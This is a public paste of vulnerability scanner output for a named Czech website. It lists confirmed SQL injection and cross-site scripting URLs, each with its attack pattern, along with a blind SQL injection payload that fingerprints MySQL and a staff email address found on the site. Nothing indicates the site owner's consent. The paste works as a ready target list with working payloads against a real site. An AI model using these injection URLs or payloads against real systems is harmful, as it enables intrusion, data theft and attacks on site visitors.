API tools faq
paste
Advertisement
sroub3k

web-stranky.cz

sroub3k
Feb 4th, 2012
198
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.85 KB | None | 0 0
raw download clone embed print report
  1. http://web-stranky.cz/
  2.  
  3. Boolean Based SQL Injection
  4.  
  5. Severity : Critical
  6. Confirmation : Confirmed
  7. Detection Accuracy :
  8. Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=' OR 'ns'='ns&page_include=w_reference
  9. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  10. Parameter Name: templ
  11. Parameter Type: Querystring
  12. Attack Pattern: ' OR 'ns'='ns
  13.  
  14. Severity : Critical
  15. Confirmation : Confirmed
  16. Detection Accuracy :
  17. Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=' OR 'ns'='ns&page_include=p_top_messages_history&reset=yes
  18. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  19. Parameter Name: templ
  20. Parameter Type: Querystring
  21. Attack Pattern: ' OR 'ns'='ns
  22.  
  23. Severity : Critical
  24. Confirmation : Confirmed
  25. Detection Accuracy :
  26. Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=' OR 'ns'='ns&page_include=p_top_messages_reactions&id_top_message=115436
  27. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  28. Parameter Name: templ
  29. Parameter Type: Querystring
  30. Attack Pattern: ' OR 'ns'='ns
  31.  
  32. Severity : Critical
  33. Confirmation : Confirmed
  34. Detection Accuracy :
  35. Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=' OR 'ns'='ns&page_include=p_top_messages_history&p_top_messages_stranka=2
  36. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  37. Parameter Name: templ
  38. Parameter Type: Querystring
  39. Attack Pattern: ' OR 'ns'='ns
  40.  
  41. Severity : Critical
  42. Confirmation : Confirmed
  43. Detection Accuracy :
  44. Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=w_index&page_include=' OR 'ns'='ns
  45. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  46. Parameter Name: page_include
  47. Parameter Type: Querystring
  48. Attack Pattern: ' OR 'ns'='ns
  49.  
  50. Severity : Critical
  51. Confirmation : Confirmed
  52. Detection Accuracy :
  53. Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=w_index&page_include=' OR 'ns'='ns&reset=yes
  54. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  55. Parameter Name: page_include
  56. Parameter Type: Querystring
  57. Attack Pattern: ' OR 'ns'='ns
  58.  
  59. ||| XSS (Cross-site Scripting)
  60.  
  61. Severity : Important
  62. Confirmation : Confirmed
  63. Detection Accuracy :
  64. Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ='"--></style></script><script>alert(0x000091)</script>&page_include=w_reference
  65. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  66. Parameter Name: templ
  67. Parameter Type: Querystring
  68. Attack Pattern: '"--></style></script><script>alert(0x000091)</script>
  69.  
  70. Severity : Important
  71. Confirmation : Confirmed
  72. Detection Accuracy :
  73. Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ='"--></style></script><script>alert(0x000088)</script>&page_include=p_top_messages_history&reset=yes
  74. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  75. Parameter Name: templ
  76. Parameter Type: Querystring
  77. Attack Pattern: '"--></style></script><script>alert(0x000088)</script>
  78.  
  79. Severity : Important
  80. Confirmation : Confirmed
  81. Detection Accuracy :
  82. Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ='"--></style></script><script>alert(0x000102)</script>&page_include=p_top_messages_reactions&id_top_message=115436
  83. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  84. Parameter Name: templ
  85. Parameter Type: Querystring
  86. Attack Pattern: '"--></style></script><script>alert(0x000102)</script>
  87.  
  88. Severity : Important
  89. Confirmation : Confirmed
  90. Detection Accuracy :
  91. Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ='"--></style></script><script>alert(0x000105)</script>&page_include=p_top_messages_history&p_top_messages_stranka=2
  92. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  93. Parameter Name: templ
  94. Parameter Type: Querystring
  95. Attack Pattern: '"--></style></script><script>alert(0x000105)</script>
  96.  
  97. ||| MySQL Database Identified
  98.  
  99. Severity : Information
  100. Confirmation : Confirmed
  101. Detection Accuracy :
  102. Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=-w_index'OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))-- &page_include=w_reference
  103. Vulnerability Classifications: -
  104. Parameter Name: templ
  105. Parameter Type: Querystring
  106. Attack Pattern: -w_index'OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--
  107.  
  108. ||| E-mail Address Disclosure
  109.  
  110. Severity : Information
  111. Confirmation : Confirmed
  112. Vulnerable URL : http://web-stranky.cz/cgi/sonic.cgi?templ=w_index&page_include=w_reference
  113. Found E-mails: petr.vyhnalek@web-stranky.cz
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!